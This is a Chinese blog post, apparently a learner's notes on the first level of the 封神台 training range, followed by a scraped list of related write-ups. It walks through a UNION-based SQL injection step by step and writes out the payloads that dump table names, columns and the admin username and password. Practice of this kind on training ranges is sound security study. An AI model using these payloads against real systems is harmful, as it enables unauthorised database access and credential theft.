最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。

一、寻找注入点

看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。

二、判断字段数

在发现这可以进行SQL注入后便要判断它的字段数,用order by函数对数据库进行测试。发现到了3之后网页出现错误,1和2网页显示正常。

三、判断回显点

使用union select 1,2判断,页面上有显示。

四、寻找相关内容

union select 1,version()发现数据库版本为5.5.53
union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()得到表名为admin,dirs,news,xss
union select 1,group_concat(column_name) from information_schema.columns where table_name = 'admin'得到字段名为Id,username,password
union select 1,group_concat(username,password) from admin可知密码
总结:第一关还比较基础,主要还是要了解SQL语句的用法,在今天复现的时候还是忘了许多东西,在判断回显点的时候语句输入对了,但是网页没显示出来,反复查阅了其他大佬的通关步骤,发现并没什么问题,我就考虑到是不是我浏览器的问题,便关闭了Tampermonkey、Darkreader等插件,再回车就显示出来了。最后发现是Darkreader把回显点覆盖了,在爆破字段名输入SQL语句的时候还有点拼写错误。(要注意细节)

mbp 封神台靶场 一(笔记)相关推荐

  1. 封神台靶场writeup

    封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件: 用域名爆破工具,放入字典后爆破:答案为:http://8adc3387c2ed6 ...

  2. 封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)

    文章目录 前言 一.概括 二.题目要求 三.实践步骤 1.找到可以影响网页的参数 2.判断网站是否存在漏洞 3.order by判断字段数 4.union判断回显点 5.数据查询 总结 前言 本篇文章 ...

  3. “封神台”靶场跑不了爆破,临时解决办法(亲测有效)

    零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全--杨路恒 最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题, ...

  4. 封神台靶场 kali训练营第二关WP

    打开靶场 测试注入点1' and 1=2 #页面报错,存在注入 直接跑sqlmap sqlmap指令:-u(指定注入点)                              --dbs(查看库) ...

  5. 封神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)

    文章目录 一 .第一章 二.第二章 三.第五章 四.第六章 五.第七章 总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表. 本文将 ...

  6. 封神台靶场-尤里的复仇-第二章

    1,随便选择一则新闻,同样判断是否存在SQL注入发现存在and update delete ; insert mid master限制 and update delete ; insert mid m ...

  7. 封神台靶场-尤里的复仇-第一章

    1,在点击过新闻一后发现网址变为http://cntj8003.ia.aqlab.cn/index.php?id=1 ,尝试是否存在注入,输入and 1=1和and 1=2看返回内容是否相同来判断是否 ...

  8. 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章

    [封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...

  9. 封神台—高校靶场ctf—第一期Web web_008

    封神台-高校靶场ctf-第一期Web web_008 web_008 php审计 难度:⭐⭐ 首先咱们观察提示获取源码,这时第一想到的就是查看网页源码咱们先点开传送门来看一下题 一个可以提交数据到服务 ...

最新文章

  1. noip2010提高组3题题解 by rLq
  2. flask连接不到mysql数据库,即使使用了python flask mysql,也无法将数据提交到数据库(使用python flask mysql)连接.提交()...
  3. 【深度学习】深度学习模型训练全流程!
  4. C语言函数题-两对儿参数的交换
  5. Java文件类字符串getAbsolutePath()方法(带示例)
  6. 集合——对象数组(引用数据类型数组)
  7. 2016级算法期末上机-H.难题·AlvinZH's Fight with DDLs III
  8. oracle坏块修复
  9. iOS底层探索之多线程(十五)—@synchronized源码分析
  10. python找重复元素_Python笔记(二)查找重复元素
  11. 转接口IC ADV7280/ADV7280-M:CVBS转MIPI芯片 10位、4倍过采样标清电视视频解码器,支持去隔行
  12. 替换jar包中的class文件
  13. allatori8.0文档翻译-第十四步:Eclipse IDE插件
  14. android twitter 分享代码,Twitter分享集成
  15. 计算机制作画报说课稿,幼儿园小班主题秋的画报说课稿教案反思
  16. 使用pyppeteer或者selenium时,chrome窗口最大化
  17. 余弦相似度-C#代码实现
  18. win 7 必备 2
  19. Instrument 之 time Profiler
  20. JavaScript学习(七)——对象与数组、内部对象(1)

热门文章

  1. 三维地形图建模仿真与Matlab之间的数据交换
  2. 数据仓库之【用户行为数仓】11:【dws层:数据汇总层】【appc层:数据应用层】需求4:每日启动App次数相关指标
  3. 几款截图软件分析,拷屏,切图和粘贴
  4. 科技的成就(三十九)
  5. Found several packages [runtime, main] in ‘/usr/local/Cellar/go/1.18/libexec/src/runtime;
  6. 3D Tiles 简单介绍
  7. Base64与Bitmap转换
  8. 图像处理——孔洞填充算法
  9. 蒙氏计算机教育目的,蒙氏数学领域基础理论及教育目的
  10. Mapbox GL可视化之热力图